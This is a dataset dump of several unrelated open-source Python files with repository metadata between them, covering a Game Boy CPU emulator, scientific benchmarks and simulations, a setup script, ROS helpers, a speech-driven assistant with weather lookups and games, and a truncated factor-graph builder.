self.set_reg(r1, r2, (val + 1) & 0xffff)
return 8
def dec_nn(self, r1, r2, dec_sp=False):
"""
Decrement register pair r1r2
Parameters
----------
r1r2
register pair r1r2
dec_sp : boolean
if True decrements SP not r1r2
Returns
-------
int
clock cycles taken
"""
if dec_sp:
self.sp -= 1
self.sp &= 0xffff
else:
val = self.get_reg(r1, r2)
self.set_reg(r1, r2, (val - 1) & 0xffff)
return 8
def jump_nn(self):
"""
Jump to nn.
"""
val = self.mem.read_word(self.pc)
self.pc = val
return 12
def jump_cc(self, isSet, flag, immmediate_jump=False):
"""
Jump to address n if flag and isSet match
Parameters
----------
isSet : bool
Returns
-------
int
number of cycles
"""
if self.flag_set(flag) == isSet:
return self.jump_n() if immmediate_jump else self.jump_nn()
if not immmediate_jump:
self.pc += 1 #two byte jump address so skip it
self.pc += 1
return 12
def jump_hl(self):
"""
Jump to address in HL
Returns
-------
int
cycles taken
"""
self.pc = self.get_reg(self.H, self.L)
return 4
def jump_n(self):
"""
Add n to current address and jump to it.
Returns
-------
int
cycles taken
"""
val = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.pc += val
return 8
def dec_adjust(self):
"""
Decimal adjust reg A to a representation of Binary Coded Decimal.
Flags
Z - Set if A is zero
N - Not affected
H - Reset
C - Set or reset
referenced GB programming manual page 110 and
github.com/gekkio/mooneye-gb
Returns
-------
int
clock cycles taken
"""
carry = False
a_reg = self.reg[self.A]
if not self.flag_set(self.flags.N):
if self.flag_set(self.flags.C) or a_reg > 0x99:
a_reg += 0x60
carry = True
a_reg &= 0xff
if self.flag_set(self.flags.H) or a_reg & 0x0f > 0x09:
a_reg += 0x06
a_reg &= 0xff
elif self.flag_set(self.flags.C):
carry = True
a_reg += 0x9a if self.flag_set(self.flags.H) else 0xa0
a_reg &= 0xff
elif self.flag_set(self.flags.H):
a_reg += 0xfa
a_reg &= 0xff
self.reset_flag(self.flags.H)
self.reset_flag(self.flags.Z)
if a_reg == 0:
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.C)
if carry:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg
return 4
def complement_a(self):
"""
Complements register A (toggles all bits).
Flags
N/H - Set
C/Z - Not affected
Returns
-------
int
number of cycles taken
"""
self.reg[self.A] ^= 0xff
self.set_flag(self.flags.N)
self.set_flag(self.flags.H)
return 4
def complement_cf(self):
"""
Complements the carry flag (toggles it).
Flags
Z - Not affected
H/N - Reset
C - Toggles
Returns
-------
int
cycles taken
"""
if self.flag_set(self.flags.C):
self.reset_flag(self.flags.C)
else:
self.set_flag(self.flags.C)
self.reset_flag(self.flags.N)
self.reset_flag(self.flags.H)
return 4
def set_cf(self):
"""
Sets the carry flag.
Flags
Z - Not affected
H/N - Reset
C - Set
Returns
-------
int
cycles taken
"""
self.set_flag(self.flags.C)
self.reset_flag(self.flags.H)
self.reset_flag(self.flags.N)
return 4
def rotate_l_a_c(self):
"""
Rotates A left, old bit 7 to carry flag.
Flags
Z - Set if 0 NOTE??? RESET??
N/H - Reset
C - Contains old bit 7 data
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
msb = (a_reg & 0x80) >> 7
a_reg <<= 1
a_reg |= msb
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rotate_n_lc(self, src):
"""
Rotates n left, old bit 7 to carry flag.
Flags
Z - Set if 0
N/H - Reset
C - Old bit 7 data
...
Parameters
-----------
src
A-L, HL
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = (data & 0x80) >> 7
data <<= 1
data |= msb
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
if data == 0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data & 0xff, self.get_reg(self.H, self.L))
return 16
else:
self.reg[src] = data & 0xff
return 8
def rotate_l_n(self, src):
"""
Rotates n left through carry flag.
src - A-HL
Flags
Z - set if 0
N/H - reset
C - old bit 7 data
...
Returns
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = ((data & 0x80) >> 7) & 1
carry_in = 1 if self.flag_set(self.flags.C) else 0
data = (data << 1 | carry_in) & 0xff
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
if data == 0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
return 16
else:
self.reg[src] = data & 0xff
return 8
def rotate_l_a(self):
"""
Rotate A left through carry flag.
Flags
Z/N/H - Reset
C - Old bit 7 data
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
a_reg <<= 1
if self.flag_set(self.flags.C):
a_reg |= 1 # set lsb to C
self.reset_flags()
if a_reg & 0x100 == 0x100:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rotate_r_a_c(self):
"""
Rotates A right, old bit 0 to carry flag.
Flags:
C - Old bit 0
Z/H/N - Reset
Returns
-------
int
clock cycles taken
"""
a_reg = self.reg[self.A]
lsb = a_reg & 0x1
a_reg >>= 1
a_reg |= lsb << 7
self.reset_flags()
if lsb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
#TODO??? 0 flag set?
def rotate_r_a(self):
"""
Rotate A right through carry flag.
Flags
C - Old bit 0
Z/H/N - Reset
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
lsb = a_reg & 0x1
a_reg >>= 1
if self.flag_set(self.flags.C):
a_reg |= 0x80
self.reset_flags()
if lsb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rr_n(self, src):
"""
Rotate n right through Carry Flag
n = A-L, (HL)
Flags
Z - set if 0
N/H - Reset
C - Old bit 0
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
carryIn = 1 if self.flag_set(self.flags.C) else 0
data = (data >> 1) | (carryIn << 7)
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb != 0:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def rrc_n(self, src):
"""
Rotate n right. Old bit 0 to carry flag
Flags
Z - Set if 0
N/H - Reset
C - Old bit 0 data
Returns
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
data = (data >> 1) | (lsb << 7)
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb == 1:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 8 if src != self.HL else 16
#TODO
def stop(self):
self.pc += 1
log.critical("IMPLEMENT STOP")
return 0
#TODO
def disable_interrupts(self):
self.interrupt_enable = False
return 4
#TODO
def enable_interrupts(self):
self.interrupt_enable = True
return 4
def call(self):
"""
Push address of next instruction onto stack and then jump to address
nn.
Returns
-------
int
cycles taken
"""
address = self.mem.read_word(self.pc)
self.pc += 2
self.push_pc()
self.pc = address
return 12
def call_cc(self, flag, isSet):
"""
Call address n if isSet and flag match
Returns
-------
int
cycles taken
"""
if self.flag_set(flag) == isSet:
return 12 + self.call()
else:
self.pc += 2
return 12
def ret(self):
"""
Pops two bytes from stack jumps to that address
Returns
-------
int
cycles taken
"""
self.pc = self.mem.read_word(self.sp)
self.sp += 2
return 8
def ret_cc(self, flag, isSet):
"""
Return if isSet and flag match
Returns
-------
int
cycles taken
"""
if self.flag_set(flag) == isSet:
return 12 + self.ret()
else:
return 8
def push_pc(self):
"""
Pushes current program counter value to the stack
MSB first
"""
self.sp -= 1
self.mem.write((self.pc & 0xff00) >> 8, self.sp)
self.sp -= 1
self.mem.write((self.pc & 0xff), self.sp)
def dump_registers(self):
"""
Prints the current cpu registers and their values to the screen.
"""
print("A: ", hex(self.reg[self.A]))
print("B: ", hex(self.reg[self.B]))
print("C: ", hex(self.reg[self.C]))
print("D: ", hex(self.reg[self.D]))
print("E: ", hex(self.reg[self.E]))
print("F: ", hex(self.reg[self.F]))
print("H: ", hex(self.reg[self.H]))
print("L: ", hex(self.reg[self.L]))
print("PC: ", hex(self.pc))
print("SP: ", hex(self.sp))
def reset_flags(self):
""" Resets all Flags to 0. """
self.reg[self.F] = 0
def sla_n(self, src):
"""
Shift src left into carry, LSB of n set to 0.
Flags
Z - Set if 0
H/N - Reset
C - old bit 7 data
Parameters
----------
src
A-L, (HL)
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = (data & 0x80) & 0xff
data <<= 1
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if msb != 0:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 8 if src != self.HL else 16
def srl_n(self, src, signed):
"""
Shift n right into Carry. MSB set to 0 if signed = True, else unchanged
n : A-L, (HL)
Flags:
Z - set if 0
N/H - Reset
C - Old bit 0 data
Parameters
----------
src
register to shift
signed
if True MSB set to 0, if false not changed
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
if signed:
bit7 = data & 0x80
data >>= 1
data |= bit7
else:
data >>= 1
data &= 0x7f
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb == 1:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def swap(self, src):
"""
Swaps the upper and lower nibbles of n.
n = A-L/(HL)
Flags
Z - Set if 0
N/H/C - Reset
Parameters
----------
src
to swap A-L/(HL)
Returns
-------
int
clock cycles
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lower_nibble = data & 0xf
data = ((data & 0xf0) >> 4) | (lower_nibble << 4)
self.reset_flags()
if data == 0x0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def bit_br(self, bit, reg):
"""
Tests bit b in register r.
Flags:
Z - Set if 0
N - reset
H - set
C - not affected
Returns
-------
int
number of cycles
"""
if reg == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[reg]
self.reset_flag(self.flags.Z)
if not self.is_set(data, bit):
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.N)
self.set_flag(self.flags.H)
return 8 if reg == self.HL else 4
def set_b_r(self, src, bit, new_bit):
"""
Sets bit bit in src to new_bit.
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
data = self.set_bit(data, bit, new_bit)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
return 8
else:
self.reg[src] = data
return 4
def set_bit(self, num, bit, new_bit):
"""
Sets bit bit in num to new_bit.
"""
if new_bit == 1:
return num | 1 << bit
else:
return num & ~(1 << bit)
def is_set(self, num, bit):
"""
Tests if bit bit is set in num.
Returns
-------
True if 1
False if 0
"""
return ((num >> bit) & 0x1) == 0x1
def restart(self, offset):
"""
Pushes current address onto the stack, and then jumps to
0x0 + offset.
"""
self.push_pc()
self.pc = offset
return 16
#TODO
def ret_interrupts(self):
"""
Returns and enables interrupts
"""
self.interrupt_enable = True
return self.ret()
def halt(self):
"""
TODO
"""
return 4
|
mit
| -9,042,496,380,038,771,000
| 29.895788
| 98
| 0.479938
| false
| 3.15157
| false
| false
| false
|
gpoulin/pybeem
|
beem/ui/ui.py
|
1
|
2119
|
import os
import json
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
sip.setapi('QDate', 2)
sip.setapi('QDateTime', 2)
sip.setapi('QTextStream', 2)
sip.setapi('QTime', 2)
sip.setapi('QUrl', 2)
from PyQt4 import QtGui, QtCore
signal = QtCore.pyqtSignal
slot = QtCore.pyqtSlot
property = QtCore.pyqtProperty
from beem.io import grid_from_3ds
from beem.experiment import Grid
from beem.ui.graph import contourplot
_pref = dict()
def select_file(folder = None, filter = None):
filename = QtGui.QFileDialog.getOpenFileNames(directory = folder,
filter = filter)
return filename
def open3ds(filename = None, folder = None):
"""Return a Grid object from 3ds files
"""
if filename == None:
filename = select_file(folder = folder, filter = '3ds (*.3ds)')
if len(filename)==0:
return None
for f in filename:
try:
a = a + grid_from_3ds(f)
except NameError:
a = grid_from_3ds(f)
return a
def fast_analysis(filename = None):
"""Do the default analysis on 3ds files
"""
grid=open3ds(filename)
if grid==None:
return None
grid.normal_fit()
grid.update_dict()
grid.fit()
contourplot(grid.extract_good())
return grid
def find_config():
"""Return the location of the config and
create folder to store it if needed
"""
if os.name == 'posix':
folder = os.path.expanduser('~/.pybeem')
elif os.name == 'nt':
folder = os.path.expandvars('%APPDATA%/pybeem')
else:
raise Exception("Don't know where to save config. OS unknown")
if not os.path.exists(folder):
os.makedirs(folder)
return folder + '/pybeem.conf'
def save_pref(filename = None):
if filename == None:
filename = find_config()
fid = open(filename,'w')
json.dump(_pref,fid)
fid.close()
def load_pref(filename = None):
global _pref
if filename == None:
filename = find_config()
if os.path.exists(filename):
fid = open(filename,'r')
_pref.update(json.load(fid))
fid.close()
|
gpl-3.0
| 6,990,025,243,627,736,000
| 23.356322
| 71
| 0.622935
| false
| 3.47377
| false
| false
| false
|
kapadia/geoblend
|
benchmark/benchmark_vector.py
|
1
|
2033
|
import os
import benchmark
import numpy as np
import rasterio as rio
from skimage.morphology import disk
from geoblend.vector import create_vector
class Benchmark_Vector_Small(benchmark.Benchmark):
def setUp(self):
directory = os.path.dirname(os.path.realpath(__file__))
fixtures = os.path.join(directory, '..', 'tests', 'fixtures')
srcpath = os.path.join(fixtures, 'source.tif')
refpath = os.path.join(fixtures, 'reference.tif')
with rio.open(srcpath) as src:
self.source = src.read(1).astype(np.float64)
with rio.open(refpath) as ref:
self.reference = ref.read(1).astype(np.float64)
# Create a non-rectangular mask
d = disk(60)
dim = 121 # disk dimension is 121x121
d2 = 0.5 * dim
height, width = self.source.shape
h2, w2 = 0.5 * height, 0.5 * width
y0, y1 = int(h2 - d2), int(h2 + d2)
x0, x1 = int(w2 - d2), int(w2 + d2)
self.mask = np.zeros_like(self.source, dtype=np.uint8)
self.mask[y0:y1, x0:x1] = d
def test_cython(self):
vector = create_vector(self.source, self.reference, self.mask)
class Benchmark_Vector_Large(benchmark.Benchmark):
def setUp(self):
directory = os.path.dirname(os.path.realpath(__file__))
fixtures = os.path.join(directory, '..', 'tests', 'fixtures')
srcpath = os.path.join(fixtures, '20150805_090528_0823_analytic', '20150805_090528_0823_analytic.tif')
refpath = os.path.join(fixtures, '20150805_090528_0823_analytic', 'resampled', 'reference.tif')
with rio.open(srcpath) as src:
self.source = src.read(1).astype(np.float64)
self.mask = src.read(4).astype(np.uint8)
with rio.open(refpath) as ref:
self.reference = ref.read(1).astype(np.float64)
def test_cython(self):
vector = create_vector(self.source, self.reference, self.mask)
if __name__ == '__main__':
benchmark.main(format='markdown', each=10)
|
mit
| -4,203,776,271,449,375,000
| 30.292308
| 110
| 0.618298
| false
| 3.216772
| false
| false
| false
|
stochasticHydroTools/RigidMultiblobsWall
|
single_sphere/single_sphere_rejection.py
|
1
|
1547
|
'''This script will display a histogram of a single sphere's height when next to a wall using sphere.py.
1,000,000 heights will be generated by iterating over n_steps, and written to a text file: rejection_locations.txt
On top of the histogram is a plot of the analytical GB distribution
Prints the time taken for all the calculations'''
import numpy as np
import time
import sphere as s
outFile = 'rejection_locations.txt'
# constants listed for convenience, none here are changed from what is in sphere.py
s.A = 0.265*np.sqrt(3./2.)
s.VISCOSITY = 8.9e-4
s.WEIGHT = 1.*0.0000000002*(9.8*1e6)
s.KT = 300.*1.3806488e-5
s.REPULSION_STRENGTH = 7.5 * s.KT
s.DEBYE_LENGTH = 0.5*s.A
sample_state = [0., 0., 1.1] # the position of a single sphere
n_steps = 1000000 # the number of height positions to be generated
f = open(outFile, 'w')
start_time = time.time()
# generate appropriate normalization constant
partition_steps = 10000 # number of samples generated for Z
partitionZ = s.generate_partition(partition_steps)
for i in range(n_steps):
# get a position from rejection function
sample_state = s.single_sphere_rejection(partitionZ)
# send that position to the data file
f.write(str(sample_state[2]) + '\n')
f.close()
end_time = time.time() - start_time
print(end_time) # should take somewhere around 80 seconds for one million heights
num_points = 100000
x, y = s.analytical_distribution(num_points) # calculate points for the analytical curve
s.plot_distribution(outFile, x, y, n_steps) # generate historgram and analytical curve
|
gpl-3.0
| 848,121,353,568,755,100
| 34.976744
| 114
| 0.74596
| false
| 3.209544
| false
| false
| false
|
abmantz/lmc
|
setup.py
|
1
|
3790
|
"""A setuptools based setup module.
See (and based on):
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='lmc',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.2.1',
description='Logarithmantic Monte Carlo',
long_description=long_description,
# The project's main homepage.
url='https://github.com/abmantz/lmc',
# Author details
author='Adam Mantz',
author_email='amantz@slac.stanford.edu',
# Choose your license
license='LGPL-3.0',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
# What does your project relate to?
#keywords='sample setuptools development',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['examples']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['numpy'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
#extras_require={
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
#package_data={
# 'sample': ['package_data.dat'],
#},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
#entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
#},
)
|
lgpl-3.0
| 3,584,288,068,886,303,000
| 34.092593
| 94
| 0.665963
| false
| 3.947917
| false
| false
| false
|
icoderaven/slytherin_dagger
|
src/utils.py
|
1
|
1217
|
#!/usr/bin/env python
import math
import numpy as np
#----------------------------------------------------------------------
#converts angles in degrees to radians
#----------------------------------------------------------------------
def deg_to_rad(angle):
return angle*math.pi/180.0
#----------------------------------------------------------------------
#converts angles in radians to degrees
#----------------------------------------------------------------------
def rad_to_deg(angle):
return angle*180.0/math.pi
#----------------------------------------------------------------------
#converts ROS Point/Vector3 object to a numpy array
#----------------------------------------------------------------------
def convert_position_to_array(position):
pos = np.zeros(3)
pos[0] = position.x
pos[1] = position.y
pos[2] = position.z
return pos
#----------------------------------------------------------------------
#converts ROS Quaternion object to a numpy array
#----------------------------------------------------------------------
def convert_orientation_to_array(orientation):
q = np.zeros(4)
q[0] = orientation.x
q[1] = orientation.y
q[2] = orientation.z
q[3] = orientation.w
return q
|
bsd-3-clause
| 7,963,987,814,229,428,000
| 32.805556
| 72
| 0.380444
| false
| 4.698842
| false
| false
| false
|
i-am-Q/my_py
|
mypa.py
|
1
|
12022
|
#mypa.py
import speech_recognition as sr #imports Speech_Recognition Modules
from AppKit import NSSpeechSynthesizer #imports Speech Synthesizer for tts
from random import randint #imports randint function
import time #imports time modules to pause actions
import sys #imports system functions
import json #imports json
import urllib
#import pyaudio #imports pyaudio to play audio
#import wave #imports .wav conversion
r = sr.Recognizer() #used to shorten recognizer
cont = True #used for while loops
playAgain = True
nssp = NSSpeechSynthesizer #used to shorten apples native speech synthisizer
ve = nssp.alloc().init() #used to shorten memory allocation and initiation of speech synthisizer
voice = 'com.apple.speech.synthesis.voice.alex' #voice chosen for speech synthesizer
ve.setVoice_(voice) #sets appropriate voice
key = '19915fc68b895c6e' #api key for wunderground
def wakeUp(): #main function, will be used to "wake up" similar to "hey siri"
while cont: #ensures that the loop runs continuously
iSaid = listen() #listens for my imput
if iSaid == 'hey bro': #'hey bro' is the wake up command. This statement checks to see if user wants to do something
talking('How can I help you sir',2) #talking funtion called
selection()
else: #if nothing is said that matches up prints warning and plays sound
print 'no go' #warning
print('\a')
def preSelection(userText, compare): #figures out which commands are being given based on a list of key words
try:
myCommand = [userText.find(word) != -1 for word in compare] #creates a true or false array based on what was said
comInterpreted = [i for i, x in enumerate(myCommand) if x] #extracts position of only true responses
return comInterpreted #sends back the response
except AttributeError:
print AttributeError #response when nothing is said
def selection():
while True:
iSaid = listen() #listen function called
broCommands = ['high','low','quit','current','weather','forecast','rock','paper','scissors','outside'] #key words to look out for
findTruth = preSelection(iSaid, broCommands)
print findTruth
if (findTruth == [0,1]): #'game' command to start hi low game
playHiLow() #stars hi low game
elif (findTruth == [2]): #'quit command to terminate program
break #quits program
elif (findTruth == [3,4]) or (findTruth == [4,9]): #'weather' command to get current weather
currentWeather() #gets weather
elif (findTruth == [4,5]): #'forecast' command to get four day fourcast
forecast() #gets forecast
elif (findTruth == [6,7,8]): #'rps' command to play rps
rpsGame() #plays rps game
def talking(text,talkTime): #(text) are the words that will be said. (talkTime) is the amount of time needed to complete sentence. This function will say the words and ensure that the program pauses so it does not hear itself
while ve.isSpeaking: #loop runs while the comp is talking
ve.startSpeakingString_(text) #says the text that is passed to the function
time.sleep(talkTime) #takes a pause while the computer speaks
break
def listen(): #listens to what is being said
with sr.Microphone() as source: #determines which mic to use
print '-'*50
print ''
print 'Adjusting for background noise' #preps to take background noise
r.adjust_for_ambient_noise(source) #listens for ambient noise
print("Set minimum energy threshold to {}".format(r.energy_threshold)) #displays ambient noise adjustment
print 'I am listining' #preps to listen to user
audio = r.listen(source) #listens to user
try:
myWords = r.recognize(audio) #turns captured audio into text
print('This time you said:' + myWords) #prints what you said
print ''
return myWords #returns the text so that it can continue to be used
except LookupError: #warns user that the audio could not be interpereted
talking('I am sorry, I could not understand what you said',3)
def playHiLow(): #Higher or Lower Game
playAgain = True #defines play again state
while playAgain: #loop to play game
numGuess = 0 #on a new game, number of guesses restarts
compNum = randint(1,10) #computer picks number
print compNum #DELETE LATER display computers number
talking('I have picked a number between one and ten. Can you guess what it is?',5) #let user know game has started
while True: #starts loop for current game
playerGuess = listen() #listens for players guess
if playerGuess == 'sex': #checks for the number 6 (has difficulty understanding difference between 6 and sex)
playerGuess = '6' #turns 'sex' into string '6'
try: #checks to see if it can make an integer
playerGuess = int(playerGuess) #turns number string into int
except ValueError: #if it can not turn into a string act like it did not understand
talking('I am sorry, I could not understand what you said',3) #proclaim ignorance
if playerGuess == compNum: #checks for a winning condition
numGuess += 1 #adds final count to number of guesses
text = 'Congratulations! You won in %i guesses!' %(numGuess) #congratulates the winner
talking(text,4) #says congratulations
talking('Do you want to play again. Yes or no?',2) #asks to play again
reDo = listen() #listens for user response
if reDo == 'yes': #checks if new game is to be played
break #breaks current loop to start a new game
else: #if anything else is said, assume a quit
playAgain = False #signal to end the entire game
break #break current loop
elif playerGuess < compNum: #check if players guess is below computers number
talking('Guess higher',1) #tell user to guess higher
numGuess += 1 #add to guess count
elif playerGuess > compNum: #check if players guess is above computers guess
talking('Guess lower',1) #tell user to guess lower
numGuess += 1
def getZIP():
url = 'http://ipinfo.io/json'
f = urllib.urlopen(url)
json_string = f.read()
parsed_json = json.loads(json_string)
zip = parsed_json['postal']
city = parsed_json['city']
state = parsed_json['region']
data = [zip,city,state]
return data
def currentWeather(): #current weather function
zip = getZIP() #listens for zip code
text = 'getting weather information on ' + zip[1] + ',' + zip[2]
talking(text, 4)
url = 'http://api.wunderground.com/api/' + key + '/geolookup/conditions/q/PA/' + zip[0] + '.json' #goes to wunderground api
f = urllib.urlopen(url) #gets data
json_string = f.read() #reads data
parsed_json = json.loads(json_string) #parses data
city = parsed_json['location']['city']
state = parsed_json['location']['state']
weather = parsed_json['current_observation']['weather']
temperature_string = parsed_json['current_observation']['temp_f']
temperature_string = str(temperature_string)
feelslike_string = parsed_json['current_observation']['feelslike_f']
weatherText = 'Weather in ' + city + ', ' + state + ': ' + weather.lower() + '. The temperature is ' + temperature_string + ' but it feels like ' + feelslike_string + '.'
talking(weatherText, 10)
f.close()
def forecast(): #four day forecast
zip = getZIP() #listens for zip code
text = 'getting weather information on ' + zip[1] + ',' + zip[2]
talking(text, 4)
url = 'http://api.wunderground.com/api/' + key + '/geolookup/forecast/q/' + zip[0] + '.json' #goes to wunderground api
f = urllib.urlopen(url) #gets data
json_string = f.read() #reads data
parsed_json = json.loads(json_string) #parses data
for day in parsed_json['forecast']['simpleforecast']['forecastday']: #loop to anounce forecast
x = day['date']['day'] #day is an intiger
y = str(x) #convert intiger to string
forecastText = 'The weather for ' + day['date']['weekday'] + ', ' + day['date']['monthname'] + ' ' + y + ' will be ' + day['conditions'] + ' with a high of ' + day['high']['fahrenheit'] + ' degrees fahrenheit and a low of ' + day['low']['fahrenheit'] + ' degrees farenheit'
talking(forecastText, 10)
f.close()
class rpsGame:
def __init__(self): #play RPS
compScore = 0
playerScore = 0
tieGame = 0
player = 0
playing = True
validity = True
talking('Lets play a game of Rock, Paper, Scissors', 3) #lets player know that the game is starting
while playing : #starts loop to play game
while validity: #starts loop for player selection
iSaid = listen() #listens for player response
broCommands = ['rock','paper','scissors','quit','Rock'] #key words to look out for
playerHand = preSelection(iSaid, broCommands)
if (playerHand == [0]) or (playerHand == [4]):
player = 1
break
elif playerHand == [1]:
player = 2
break
elif playerHand == [2]:
player = 3
break
elif playerHand == [3]:
player = 4
break
else:
print 'Invalid Choice'
if player ==4: #quits game
if playerScore > compScore:
text = 'final score, player %i, computer %i, Congratulations you win' % (playerScore, compScore)
elif playerScore < compScore:
text = 'final score, player %i, computer %i, Computer wins' % (playerScore, compScore)
else :
text = 'final score, player %i, computer %i, tie game' % (playerScore, compScore)
talking(text, 6)
break
else: #starts to determine a winner
comp = self.compHand() #gets a "hand" for computer
result = self.playHand(comp, player) #gets a result
playerChoice = self.interpret(player) #turns numbers into readable text
compChoice = self.interpret (comp)
print '\nYou played %s and the computer played %s' % (playerChoice, compChoice)
talking(result, 2)
print ''
print '-'*34
if result == 'Computer wins!':
compScore += 1
elif result == 'Player wins!':
playerScore += 1
elif result == 'Tie game':
tieGame += 1
print 'Player: %i Computer: %i Tie Games: %i' % (playerScore, compScore, tieGame)
print '-'*34
print ''
def compHand(self): #needed for rps game
compVal = randint(1,3)
return compVal
def interpret(self,num): #needed for rps game
if num == 1:
talking('Rock', 1)
return 'Rock'
elif num == 2:
talking('Paper', 1)
return 'Paper'
elif num == 3:
talking('Scissors', 1)
return 'Scissors'
def playHand(self,comp, player): #needed for rps game
if comp == player:
return 'Tie game'
if (comp == 1 and player == 3) or (comp == 2 and player == 1) or (comp == 3 and player == 2):
return 'Computer wins!'
else:
return 'Player wins!'
"""
if myWords == "run": #looks for 'run' command to run the hi low game
print 'got it'
import hi_lowGame
elif myWords == "game": #looks for 'game' command to run rps game
print 'starting game'
import rps_game
else: #lets user know that the command does not do anything
print 'not a command'
import random
"""
wakeUp()
|
gpl-2.0
| 7,865,665,472,232,642,000
| 45.242308
| 278
| 0.619198
| false
| 3.332964
| false
| false
| false
|
jessica-taylor/quipp2
|
src/python/graphbuilder.py
|
1
|
16660
|
import math
import numpy as np
from numpy import linalg
import itertools
from callhaskell import *
class Queue(object):
def __init__(self, items=None):
if items is None:
self.items = []
else:
self.items = list(reversed(items))
def dequeue(self):
return self.items.pop()
class VarId(object):
def __init__(self, state, id, expfam):
assert isinstance(id, int)
self.state = state
self.id = id
self.expfam = expfam
class FactorId(object):
def __init__(self, state, id):
assert isinstance(id, int)
self.state = state
self.id = id
class RandFunId(object):
def __init__(self, state, id):
assert isinstance(id, int)
self.state = state
self.id = id
class GraphState(object):
def __init__(self):
self.vars = {}
self.var_count = 0
self.rand_funs = []
self.factors = []
self.var_replacements = {}
def new_var(self, expfam):
varid = self.var_count
self.var_count += 1
self.vars[varid] = expfam
return VarId(self, varid, expfam)
def resolve_var(self, varid):
if varid.id in self.var_replacements:
return self.var_replacements[varid.id]
else:
return varid
def unify_vars(self, a, b):
self.var_replacements[b.id] = a
del self.vars[b.id]
return a
def unify_values(self, typ, a, b):
# TODO: this fails for e.g. Maybe
